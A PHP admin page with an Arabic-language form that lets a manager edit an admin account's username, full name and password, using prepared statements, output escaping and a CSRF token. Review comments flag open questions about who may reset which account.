<?php
// Buffer all output so the header() redirects further down still work even
// after markup or whitespace has been emitted between the PHP blocks.
ob_start();
// Resume the session; the access check below reads $_SESSION.
session_start();
// Page title (Arabic: "Edit account details"); presumably consumed by the
// included template — confirm in init.php.
$pageTitle = ' تعديل بيانات الحساب ';
// NOTE(review): $conn, used by the queries below, is not defined in this file;
// presumably init.php sets it up — confirm.
include 'init.php';
?>
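<?php
/*
 * Manager-only page that edits the username, full name and password of one
 * row in `royaladmin`.
 *
 * Request flow (all POST):
 *   - the page is opened with `ad_id`            -> the form is rendered;
 *   - the form is submitted with `do_edit_mypass` -> the row is updated and
 *     the browser is redirected to admins.php.
 *
 * Hardening applied here:
 *   - the account id is validated as digits and bound as a query parameter
 *     instead of being interpolated into the SQL text (SQL injection);
 *   - every value echoed into the markup is HTML-escaped, including
 *     PHP_SELF, which carries client-controlled path info (XSS);
 *   - the update requires a per-session anti-CSRF token issued by this form;
 *   - required fields are enforced server-side, so an empty password can no
 *     longer be stored by skipping the browser's `required` check;
 *   - the session checks use strict comparison.
 *
 * NOTE(review): the target account is chosen by a request parameter and the
 * current password is never verified (the original read `oldpass`, which the
 * form does not send, and `$admin`, which this file does not define, and then
 * used neither). Any session of type manager can therefore reset any account.
 * Confirm this is intended, or require the acting manager's current password.
 */
if (
    isset($_SESSION['user_liwwan_admin_2023930'], $_SESSION['type'])
    && $_SESSION['type'] === 'manager_session_alliwan'
) {
    // Escapes a value for use in HTML text and quoted attribute contexts.
    $esc = function ($value) {
        return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    };

    $msg = '';

    // The id arrives as `ad_id` when the page is opened and as `admin_id`
    // (hidden field) when the form is submitted. Only plain digits are
    // accepted; anything else sends the user back to the list.
    // Assumes adminid is an integer key — the original query used it unquoted.
    $adminid = $_POST['admin_id'] ?? ($_POST['ad_id'] ?? '');
    if (!is_string($adminid) || preg_match('/\A[0-9]{1,18}\z/', $adminid) !== 1) {
        header('Location:admins.php');
        exit();
    }

    // One anti-CSRF token per session, created on first use.
    if (empty($_SESSION['csrf_edit_admin']) || !is_string($_SESSION['csrf_edit_admin'])) {
        $_SESSION['csrf_edit_admin'] = bin2hex(random_bytes(32));
    }

    if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['do_edit_mypass'])) {
        // Reject submissions that did not originate from this form.
        $sentToken = $_POST['csrf_token'] ?? '';
        if (!is_string($sentToken) || !hash_equals($_SESSION['csrf_edit_admin'], $sentToken)) {
            header('Location:admins.php');
            exit();
        }

        $fname = $_POST['adfullname'] ?? '';
        $nname = $_POST['adusername'] ?? '';
        $npaas = $_POST['newpass'] ?? '';

        $allPresent = is_string($fname) && $fname !== ''
            && is_string($nname) && $nname !== ''
            && is_string($npaas) && $npaas !== '';

        if (!$allPresent) {
            // "All fields are required" — shown in the error box of the form.
            $msg = 'جميع الحقول مطلوبة';
        } else {
            $chahashpass = password_hash($npaas, PASSWORD_ARGON2I);

            // Every value, including the row id, is bound as a parameter.
            $stmt = $conn->prepare(
                'UPDATE royaladmin SET fullname = ?, username = ?, password = ? WHERE adminid = ?'
            );
            $stmt->execute([$fname, $nname, $chahashpass, $adminid]);

            // NOTE(review): this replaces the logged-in manager's session name
            // with the edited account's full name, even when the edited
            // account belongs to someone else — confirm this is intended.
            $_SESSION['user_liwwan_admin_2023930'] = $fname;

            header('location:admins.php');
            exit();
        }
    }

    // Load the current values to pre-fill the form.
    $stb = $conn->prepare('SELECT username,fullname FROM royaladmin WHERE adminid = ?');
    $stb->execute([$adminid]);
    $admininfo = $stb->fetch();
    if ($admininfo === false) {
        // Unknown id: nothing to edit.
        header('Location:admins.php');
        exit();
    }
?>
<section class="add_my">
        <form action="<?php echo $esc($_SERVER['PHP_SELF']) ?>" method="POST" class="form mt-5">
            <input type="hidden" name="csrf_token" value="<?php echo $esc($_SESSION['csrf_edit_admin']) ?>">
            <p class="text-center h3 fw-bold text-center form_tittle"> تعديل إسم المستخدم و كلمة المرور للحساب </p>
            <div class="ermsg">
            <?php if(!empty($msg)) { 
                echo '<hr>' . '<div class="bg-danger text-white py-3 px-1 rounded-2 text-center fw-bold">';
                echo $esc($msg) . '<br>';
                echo '</div>' . '<hr>'; }?>
            </div>
            <hr class="my-1">
            <div class="row">
                <div class="col-lg-12 col-sm-12 my-2 text-center">
                    <div class="upload_img_benfs w-50 m-auto">
                        <label for="ordertitle" class="text-primary fw-bold text-center"> إسم المستخدم  <i class="fa-solid fa-asterisk px-2 text-danger"></i></label>
                        <input type="text" class="w-100 text-muted text-end fw-bold py-3" name="adusername" value="<?php echo $esc($admininfo['username']) ?>" required="required" id="ordertitle"/> 
                    </div>
                </div>
                <hr>
                <div class="col-lg-12 col-sm-12 my-2 text-center">
                    <div class="upload_img_benfs w-50 m-auto">
                        <input type="hidden" name="admin_id" value="<?php echo $esc($adminid) ?>">
                        <label for="ordertitle" class="text-primary fw-bold text-center"> الإسم الكامل  <i class="fa-solid fa-asterisk px-2 text-danger"></i></label>
                        <input type="text" class="w-100 text-muted text-end fw-bold py-3" name="adfullname" value="<?php echo $esc($admininfo['fullname']) ?>" required="required" id="ordertitle"/> 
                    </div>
                </div>
                <hr>
                <div class="col-lg-12 col-sm-12 my-2 text-center">
                    <div class="upload_img_benfs w-50 m-auto">
                        <label for="ordertitle" class="text-primary fw-bold text-center"> إختر كلمة المرور الجديدة  <i class="fa-solid fa-asterisk px-2 text-danger"></i></label>
                        <input type="password" class="w-100 text-muted text-end fw-bold py-3" name="newpass" required="required" id="ordertitle"/> 
                    </div>
                </div>
            </div>
            <div class="row">
                <hr class="my-4">
                <div class="col-12">
                <button class="btn btn-primary conf_btn px-4" name="do_edit_mypass" type="submit" onclick="return confirm('متأكد من الرغبة بتعديل إسم المستخدم و كلمة المرور لهذا الحساب ؟');"> تأكيد </button>
                </div>
            </div>  
        </form>
</section>

<?php 
}else{
// No manager session: send the visitor to the login page and stop.
header('Location:index.php');
exit;
}
?>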
<?php
// Reached only when the form was rendered; the redirect paths above exit first.
// Emit the shared footer template, then flush the buffer opened by ob_start()
// at the top of the file.
include 'assets/includes/template/footer.php';
ob_end_flush();
